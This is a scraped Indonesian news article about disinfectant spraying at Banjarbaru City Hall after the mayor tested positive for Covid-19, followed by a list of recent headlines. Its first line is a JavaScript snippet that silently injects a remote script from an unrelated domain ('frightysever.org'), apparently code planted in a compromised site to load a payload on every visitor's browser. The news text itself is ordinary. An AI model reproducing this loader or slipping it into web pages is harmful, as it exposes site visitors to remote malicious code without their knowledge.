(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Pasca Wali Kota Terpapar Covid-19, Balai Kota Banjarbaru ‘Dihujani’ Cairan Disinfektan


KANALKALIMANTAN.COM, BANJARBARU – Sebagai upaya pencegahan penyebaran Covid-19 di lingkungan Balai Kota Banjarbaru, penyemprotan cairan disifektan dilaksanakan. Kali ini menyasar ke seluruh kantor di area lingkungan balai kota, pada Rabu (29/7/2020) sore.

Penyemprotan disinfektan ini terselenggara atas kerjasama pihak Badan Penanggulangan Bencana Daerah (BPBD) Kota Banjarbaru Polri dan TNI.

Dalam hal ini, setidaknya empat unit armada tangki air milik BPBD dan tim Gegana Brimob Polda Kalsel dikerahkan untuk melakukan penyemprotan di area halaman Balai Kota Banjarbaru. Termasuk, seluruh isi ruangan perkantoran juga tak luput dari penyemprotan disinfektan.

Sebelum dilaksanakannya kegiatan ini, Pemerintah Kota (Pemko) Banjarbaru telah memerintahkan kepada seluruh pegawai Aparatur Sipil Negara (ASN) untuk mengosongkan setiap ruangan sebelum pukul 16.00 Wita. Masing-masing kantor diwajibkan menugaskan 1 pegawai untuk tetap tinggal dan membukakan pintu selama kegiatan penyemprotan ini berlangsung.

Kepala Bagian Humas dan Protokol Pemko Banjarbaru, Dedy Sutoyo, mengungkapkan penyemprotan disinfektan pada hari ini adalah kali kedua pelaksanaan, setelah sebelumnya dilakukan pada Maret lalu. “Kegiatan ini merupakan upaya preventif dan langkah lanjutan kita dalam mencegah penyebaran Covid-19 agar tidak lebih luas lagi,” katanya, kepada Kanalkalimantan.

Dedy -sapaan akrabnya, juga mengungkapkan bahwa penyemprotan disinfektan tidak hanya akan dilakukan di Balai Kota Banjarbaru saja. Namun, rencananya juga akan menyasar ke seluruh kantor dinas Satuan Kerja Perangkat Daerah (SKPD) lingkup Pemko Banjarbaru.

“Rencananya, memang seperti itu. Selain kegiatan penyemprotan disinfektan, kita juga akan melakukan upaya tracking -pelacakan- dan testing -pengujian- terhadap seluruh pegawai ASN di Pemko Banjarbaru,” tuturnya.

Sebagaimana diketahui, saat ini Pemko Banjarbaru tengah mendapat sorotan usai Wali Kota Banjarbaru, Nadjmi Adhani dan istri, dinyatakan terpapar Covid-19. Maka sudah seharusnya upaya pencegahan penyebaran virus harus dilakukan, seperti halnya sterilasi yang dilakukan pada hari ini.

Wakil Wali Kota Banjarbaru, Darmawan Jaya Setiawan, yang kini menerima mandat untuk memimpin penyelangaraan roda Pemko Banjarbaru, mengungkapkan telah memerintahkan Dinas Kesehatan (Dinkes) untuk melakukan tracing dan testing terhadap semua orang yang pernah melakukan kontak erat dengan Wali Kota serta istri, khususnya di lingkungan Pemko Banjarbaru.

“Beberapa pejabat juga sudah melakukan pemeriksaan swab. Kini hanya kita tunggu hasil swabnya,” kata Jaya.

Wakil Wali Kota mengungkapkan pihaknya sangat menyadari konsekuensi sebagai kepala daerah yang bertugas memberikan pelayanan ke masyarakat, memiliki resiko penularan yang cukup tinggi. Resiko ini sendiri juga dirasakan jajaran ASN -aparatur sipil negara- di Pemko Banjarbaru.

“Saya kembali mengingatkan kepada masyarakat bahwa pentingnya menerapkan protokol kesehatan Covid-19 jika sedang berada di luar rumah. Selain itu, kami juga meminta doa dari masyarakat, agar Wali Kota beserta istri bisa secepatnya sembuh,” pungkasnya.

Saat ini, Wali Kota Banjarbaru Nadjmi Adhani dan istri tengah menjalani pengobatan di RSUD Ulin Banjarmasin, setelah sebelumnya dirujuk dari RSD Idaman Banjarbaru. Perkembangan terakhir, kondisi Nadjmi saat ini semakin menunjukkan peningkatan kesehatan. (Kanalkalimantan.com/rico)

 

Reporter: Rico
Editor: Cell


Desy Arfianty

Recent Posts

Tingkatkan Kinerja dan Pelayanan Publik, Pemkab Banjar Audiensi ke Kementerian PAN RB

KANALKALIMANTAN.COM, JAKARTA - Pemerintah Kabupaten Banjar melaksanakan audiensi dengan Asisten Deputi Koordinasi Pelaksanaan Kebijakan dan… Read More

2 menit ago

280 Jemaah Haji HSU Dilepas Menuju Asrama Haji

KANALKALIMANTAN.COM, AMUNTAI - Lambaian tangan menyertai keberangkatan 280 jemaah haji Kabupaten Hulu Sungai Utara (HSU)… Read More

2 jam ago

Selewengkan Dana Hibah Kubah, Warga Lampihong Dituntut 15 Bulan Penjara

KANALKALIMANTAN.COM, BANJARMASIN - Jaksa Penuntut Umum (JPU) Kejaksaan Negeri (Kejari) Balangan menyatakan Arbainsyah, terdakwa kasus… Read More

3 jam ago

Garuda Semrawut, Kemenag Geram Penerbangan Haji Delay 17 Jam

KANALKALIMANTAN.COM, JAKARTA - Kementerian Agama (Kemenag) geram dengan cara yang diambil manajemen Garuda Indonesia terkait… Read More

3 jam ago

Temu Kangen Reuni Akbar Alumni SMPN 1 dan SMAN 1 Mandomai

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi hadiri temu kangen reuni akbar… Read More

4 jam ago

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

17 jam ago

This website uses cookies.